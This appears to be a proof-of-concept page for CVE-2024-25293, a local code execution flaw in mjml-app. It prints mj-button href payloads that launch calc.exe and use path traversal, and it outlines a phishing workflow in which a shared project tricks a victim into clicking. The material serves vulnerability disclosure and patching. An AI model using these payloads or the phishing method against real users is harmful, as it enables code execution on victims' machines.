POC详情: 7b1bc919f3b1e5b142e84f7b54a2c6096ef04c3e

标题: MJML App 安全漏洞 (CVE-2024-25293)
描述:MJML App是MJML开源的一款 MJML 桌面应用程序。 mjml-app 3.0.4版本和3.1.0-beta版本存在安全漏洞,该漏洞源于href属性存在远程代码执行(RCE)漏洞。
PoC for CVE-2024-25293
# MJML Local Code Execution PoC

A Proof-Of-Concept for CVE-2024-25293 vulnerability. <br><br>
mjml-app v3.0.4 & 3.1.0-beta was discovered to contain a remote code execution (RCE)
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.

As a PoC there is a python file that automates the process. 

### 1.Vunerability Overview:
 * Vulnerability Subject: Local Code Execution
 * Vulnerability Version: mjml-app 3.0.4-win & mjml-app 3.1.0-beta
 * Attack Type: Remote Code Execution
 * Attack Component: In the 'mj-button' tag within the affected source code file, the 'href' attribute enables local code execution.
 * Reserved CVE Number: CVE-2024-25293


### 2. Vulnerability Cause:
*  mjml-app 3.0.4-win & mjml-app 3.1.0 beta suffers from Security Misconfiguration In the 'mj-button' tag, which can result in arbitrary code execution.
* Exploit explain
  * Running local files through event tags in mjml applications poses a security threat. In addition, the code can be executed by combining Path Traversal within the application, requiring a patch.

Proof-of-concept (POC)
**Step 1) The attacker creates an 'mj-button' with an 'href' tag and**
* **case 1) Code Execution with Path Traversal (notepad.exe)**
* **case 2) Code Execution (calc.exe)**

        <mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
        <mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>

**Step 2) The attacker creates the main phishing project with the following code.**
<!-- header.mjml -->
    <mj-text>This is a demo jruru</mj-text>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

**Step 3) The victim opens the shared project and clicks the button, triggering the execution of payload(etc. calc , notepad)**


### 3. Additional Information
Running exe files through href tags within an application is risky, and running files in combination with Path Traversal is a security concern. This allows phishing projects to be created and deployed to execute local files. Therefore, it is essential to modify this feature to prevent such execution.

[4.0K] /data/pocs/7b1bc919f3b1e5b142e84f7b54a2c6096ef04c3e ├── [ 420] jruru.mjml └── [2.9K] README.md 0 directories, 2 files
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